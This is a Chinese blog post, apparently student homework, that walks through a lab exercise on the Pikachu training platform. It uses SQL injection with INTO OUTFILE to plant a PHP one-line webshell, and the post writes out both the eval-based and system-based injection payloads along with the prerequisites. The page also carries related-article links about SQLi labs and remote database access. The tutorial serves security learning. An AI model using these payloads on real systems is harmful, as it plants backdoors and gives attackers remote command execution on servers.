实验17:通过sqli进行服务器的远程控制

最新推荐文章于 2022-02-19 14:20:46 发布
最新推荐文章于 2022-02-19 14:20:46 发布
阅读量150 收藏 2
点赞数
分类专栏: 作业
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44720671/article/details/89078818
版权

通过sqli进行服务器的远程控制

一句话木马:是一种短小而精悍的木马客户端,隐蔽性好,且功能强大。
利用into outfile 将select结果写入指定目录1.txt中,在没有回显注入中可以用into outfile将结果写入指定文件,然后访问获取。
通过SQL漏洞写入恶意代码
前提条件:
1、需要知道远程目录
2、需要远程目录有编写权限
3、数据库开起了secure_file_priv
在这里插入图片描述
首先,我们需要知道这个目录
在这里插入图片描述
其次,要将secure_file_priv的配置改为空,可以从配置文件中自行添加
然后,我们仍以Pikachu为例,打开字符型注入
输入:kobe’ union select"<?php @eval($_GET['test'])?>",2 into outfile"/var/www/html/1
将一句话木马加在语句中。
在这里插入图片描述
前端看不到什么特殊反馈,但在数据库中,已经被写入:
在这里插入图片描述
这是木马内容:
在这里插入图片描述
我们在网页中可以访问一下:
在这里插入图片描述
得到:
在这里插入图片描述
而如果想要实现命令执行
可以将代码改为kobe’ union select"<?php system($_GET['test'])?>",2 into outfile"/var/www/html/1
我们再访问一下:
在这里插入图片描述
得到:
在这里插入图片描述
这里就有许多的数据,如ip地址,网卡数据等都显露出来

以菜之名
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
RemoteSQL 远程访问控制数据库软件 v1.03a
11-01
是Windows平台上基于标准SQL命令的一款远程数据库访问控制软件,无论被控制数据库的机器是否处于局域网内或是通过代理上网,只要控制与被控制一方具有相对固定的外部IP(动态或静态获得),就都可以使用此软件进行远程数据库控制。它支持多种数据库系统,包括Paradox 、Access 、Foxpro 、Dbase及MS SQL Server 、Oracle 、DB2 、Infomix等,可选择数据库及其中的表,查看表中各字段的详细信息,运行标准SQL语句修改数据表、字段、数据内容等,同时显示操作的结果,无论宽带窄带上网,显示结果速度都很快,效果就象在本地运行查询分析器一般。双方同时还可以进行文字交流,就象聊天一样,而无需登录其它服务器控制方还可以随时查看被控方的屏幕画面
通过sqli进行服务器远程控制的操作
qq_43814486的博客
04-08 403
通过sql inject漏洞写入恶意代码需要三个前提: 1.需要知道远程目录,就是你的用PHP语言写的网站的那个PHP文件的路径 有一个需要注意的地方,你的路径里边的斜杠是正斜杠,而直接从路径上复制下来的是反斜杠,这里需要更改一下。 ...
基于Pikachu测试平台的SQL注入-OS远程控制
qq_43499389的博客
03-19 179
一句话木马 是一种短小而精悍的木马客户端,利用我们各种语言里面提供的用来执行代码的函数,或者说用来执行操作系统命令的函数,来构造一个简单的木马程序,也就是说我们可以把这个函数直接写到文件里面去,通过对这个文件的访问去执行这个函数,向这个函数里面去传入我们想要的对应的操作,因为这个函数本身就是用来执行操作系统命令的,有些内容就会被作为远程控制的操作去执行。隐蔽性好,且功能强大 PHP:<?ph...
1.Sqli-Lab实验环境搭建
LoveStarbucks的博客
12-18 561
1.Sqli-Lab实验环境搭建 1.PhpStudy环境安装 2.火狐浏览器插件安装 3.Sqlmap安装 目前sqlmap支持2.x和3.x版本,所以直接到github中直接下载 4.Sqli-Lab安装 与DVWA安装相似,参考DVWA那篇文章 ...
SQLi Labs实验指导书
11-02
SQLi Labs 通关过程 最好的文档,1-37课解答过程,言简意赅。大佬对不住,我把你的辛苦拿来换币了
training:形成 SQLI Hybris
07-20
查看示例 从 github 获取扩展并在自定义替换 从 hybris/bin/platform 文件夹运行 ant 命令 从 hybris/bin/platform 文件夹运行 hybrisserver.bat 命令 重新导入impex training/resources/training.impex from ...
Magpi:命令行 SQLi 扫描器
07-06
喜鹊 广域 SQL 注入扫描器 此脚本可用于扫描 Web 应用程序是否存在 SQL 注入漏洞。 用法: ...其中 inputfile 是包含要扫描的 URL 列表的任何文本文件的名称,每行一个 URL,而 outputfile 是要将结果写入到的日志文件...
libinjection:SQL SQLI标记器解析器分析器
05-10
SQL / SQLI标记生成器解析器分析器。 为了 C和C ++ (外部端口) [LuaJIT / FFI]( )(外部端口) 有关详细信息和演示,请参见 。 简单的例子: # include # include # include # include " libinjection.h...
WEB:SQLI LABS撰写
03-26
SQL注入是网络安全领域一个重要的知识点,它涉及到攻击者通过输入恶意的SQL代码来操纵数据库,获取、修改、删除敏感数据,甚至完全控制数据库服务器。 描述虽然简洁,但我们可以推断出这是为了帮助用户理解和实践...
SQLi-Lab:每个SQL注入实验
03-29
当应用程序没有正确地过滤或验证用户输入的数据时,攻击者可以通过输入恶意的SQL语句来操纵数据库,获取敏感信息,甚至完全控制数据库服务器SQLi-Lab是一个专门用于学习和练习SQL注入技术的平台,对于理解和防范...
sqli-labs实战记录(一)
0verWatch的博客
08-29 3157
前言 最近啊先自己SQL注入确实不行,我只能拿出sql注入的基础部分来练练收了,这个实验环境是sqlilabs 一些前置知识 系统函数 介绍几个常用函数: 1. version()——MySQL 版本 2. user()——数据库用户名 3. database()——数据库名 4. @@datadir——数据库路径 5. @@version_compile_os——操作系统版本 字...
Sql Server数据库之间如何进行异地远程连接
热门推荐
qq_43720551的博客
01-08 1万+
最近在做软件工程课程设计,因为是小组作业,懒得每个队友建立一个数据库,于是就想说只有一个人建数据库,其余人连上,这样就算一个人改动了其中的数据,其他人数据库的内容也是可以同步的。 查阅了很多资料,现在做一下总结: 一、场景说明 场景一:我要用A电脑连接B电脑里的数据库,两台电脑是在同一个局域网里。 场景二: 我要用A电脑连接B电脑里的数据库,两台电脑不在同一个局域网里,比如一台在学校,一台在家里。 二、数据库的设置(B电脑) 第一步:开启数据库的远程连接功能 第二步:SQL Server 配置管理器配置 第
SQL Server远程连接的设置
StarryS_k_y_的博客
02-19 1万+
SQL Server正常连接时,若不需要远程操控其他电脑,可以用Windows身份验证模式,但是涉及到远程处理时,需要通过SQL Server身份验证登录。具体操作如下。 首先,我们在登录时,选择Windows身份验证,然后连接到服务器。 图1. 进入到登录主页面后,右击当前的对象资源管理器,选择属性,弹出如下图所示的页面,选择安全性,将服务器身份验证勾选为SQL Server和Windows身份验证模式,(若在安装软件时已选择第二种验证模式,可直接通过账号登录)如图2所示。 图2. ...
mssql 远程无法连接mysql_如何开启SqlServer 远程访问
weixin_33603802的博客
01-31 512
当Microsoft Sqlserver 2012 安装好后,接下的的工作需要配置Sqlserver数据库允许远程访问,只有配置了Sqlserver远程访问,其他ip客户端才能访问,配置sqlserver远程访问大致分为三步,即配置SQL Server Management Studio,配置Sqlserver配置管理器和配置防火墙,本篇文章将与大家分享如何开始Sqlserver远程访问。2配置S...
Recipe: 把SQL数据库部署到远程主机环境(第一部分)
Scott Guthrie博客中文版
01-23 8830
【原文地址】 Recipe: Deploying a SQL Database to a Remote Hosting Environment (Part 1) 【原文发表日期】 Friday, December 22, 2006 12:58 AM 场景:你开发完了一个得意的ASP.NET应用,所有的东西都测试过了而且在你本机上一切工作都正常,充分利用了ASP.NET 2.0中的成员,角色
SQL注入试验一(获取数据库内容)
Toby的博客
10-10 1万+
这篇博客是讲述SQL注入的实例操作,废话不多说,下面开始:      第一步我们要先判断是否存在注入点      进入实验的网站,如下:       然后在网址后面输入单引号'   回车(如下图,出现错误)       接下里在网址后面输入 and 1='1(此处需要注意闭合单引号,网页恢复正常)       然后将 and 1=‘1 改成 and 1=‘
SQL允许远程连接
abby535579970的博客
06-04 4317
问:在创建SQL Server本地订阅的时候时发现无法连接到另一台分发服务器。      解:在全部为默认配置的环境中,分发服务器无法被连接,猜测是因为1433端口未打开。(实际上的确是)1.使用telnet测试端口是否打开   启用windows功能telnet(控制面板-程序和功能-启用或关闭Windows功能-勾选telnet客户端),否则会遇到“telnet不是内部或外部命令”;   te...
一句话木马写入以及通过sql进行服务器远程控制
weixin_44720762的博客
04-21 1890
在开始之前我想先在这里提醒选择阅读这篇博客的读者。因为本人初涉安全领域知识。关于sql盲注尚处于学习和摸索状态,存在对些许知识点和概念理解尚不清晰甚至是完全偏差的问题。此博客亦是只起到对现所学知识的一个记录。所以只起到一个借鉴的作用,并不建议读者用作专业知识学习。 在演示通过sql进行服务器远程控制之前,必须首先清除两个基本的概念,也就是一句话木马以及如何通过into_outfile写入代码并控...
SQL注入实战:sqli-labs实验详解
SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意SQL代码来获取、修改、删除数据库中的敏感信息,甚至完全控制数据库服务器。在sqli-labs实验中,我们可以系统地学习这一攻击手段。 首先,我们需要识别...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值